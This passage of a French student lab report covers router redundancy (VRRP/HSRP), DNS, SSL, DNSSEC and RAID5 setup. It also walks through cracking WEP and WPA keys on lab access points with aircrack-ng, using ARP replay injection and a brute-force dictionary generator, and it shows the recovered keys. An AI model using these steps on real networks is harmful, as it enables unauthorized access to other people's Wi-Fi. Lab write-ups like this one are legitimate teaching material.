  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 6e séance (additionnel) ====&lt;br /&gt;
=====Configuration HSRP=====&lt;br /&gt;
Le VRRP n'était pas compatible sur le routeur du groupe 6 (3560E) à cause de la trop faible version de 'IOS Cisco. Du coup, il nous a été demandé de mettre en place le protocole en dessous de VRRP, HSRP.&amp;lt;br /&amp;gt;&lt;br /&gt;
Le protocole HSRP fonctionne comme le VRRP, et s'implémente, par BDI, comme suit:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Sstandby 1 ip 10.60.X.3&lt;br /&gt;
standby 1 preempt&lt;br /&gt;
standby 1 priority 100&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il fallait aussi que notre routeur soit connecté au 2e commutateur via une liaison fibre en mode trunk. Ainsi, nous pouvons voir, dans ce qui suit, que le routeur maitre est le routeur 3560E, et que nous sommes en standby !&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;BDI2 - Group 1 (version 2)&lt;br /&gt;
  State is Standby&lt;br /&gt;
    7 state changes, last state change 00:01:16&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Active virtual MAC address is 0000.0c9f.f001 (MAC Not In Use)&lt;br /&gt;
    Local virtual MAC address is 0000.0c9f.f001 (v2 default)&lt;br /&gt;
  Hello time 3 sec, hold time 10 sec&lt;br /&gt;
    Next hello sent in 0.128 secs&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Active router is 10.60.2.2, priority 110 (expires in 8.784 sec)&lt;br /&gt;
    MAC address is d4d7.4842.53c1&lt;br /&gt;
  Standby router is local&lt;br /&gt;
  Priority 100 (default 100)&lt;br /&gt;
  Group name is &amp;quot;Vlan2&amp;quot; (cfgd)&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puis db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''000-speedflash.space-ssl.conf''' afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;#NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/www.speedflash.space&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
ServerName &amp;quot;speedflash.space&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''ports.conf''' du serveur Apache pour qu'il écoute le port 443 (SSL):&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Listen 80 443&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
        #NameVirtualHost *:443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2enmod ssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:SSLSite.png]]&lt;br /&gt;
&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:Dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;br /&gt;
====Travail réalisé la 7e séance====&lt;br /&gt;
=====Création du RAID5=====&lt;br /&gt;
On ajoute premièrement les partitions à la définition de la machine virtuelle:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;'phy:/dev/virtual/RedFlash,xvdb,w',&lt;br /&gt;
'phy:/dev/virtual/BlackFlash,xvdc,w',&lt;br /&gt;
'phy:/dev/virtual/ReverseFlash,xvdd,w'&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on crée le RAID5 avec les 3 partitions :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mdadm --create /dev/md0 --level=5 --raid-devices 3 /dev/xvdb /dev/xvdc /dev/xvdd&amp;lt;/pre&amp;gt;&lt;br /&gt;
On vérifie en regardant le fichier de log /proc/mdstat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.0% (692512/1047552) finish=0.1min speed=30109K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===============&amp;gt;.....]  recovery = 78.5% (823084/1047552) finish=0.1min speed=29395K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [================&amp;gt;....]  recovery = 84.2% (883700/1047552) finish=0.0min speed=29456K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=================&amp;gt;...]  recovery = 87.4% (916664/1047552) finish=0.0min speed=29569K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 93.5% (980148/1047552) finish=0.0min speed=30182K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 96.6% (1012980/1047552) finish=0.0min speed=30267K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 98.1% (1029332/1047552) finish=0.0min speed=30794K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 99.5% (1043028/1047552) finish=0.0min speed=30260K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# [ 1462.872022] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, on affecte un système de fichier à notre nouveau RAID sur /dev/md0, et on le monte dans /mnt: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# mkfs /dev/md0&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
Creating filesystem with 523776 4k blocks and 131072 inodes&lt;br /&gt;
Filesystem UUID: ca2b4bcd-57d3-4f12-bc49-0f7f9cb312b6&lt;br /&gt;
Superblock backups stored on blocks:&lt;br /&gt;
	32768, 98304, 163840, 229376, 294912&lt;br /&gt;
&lt;br /&gt;
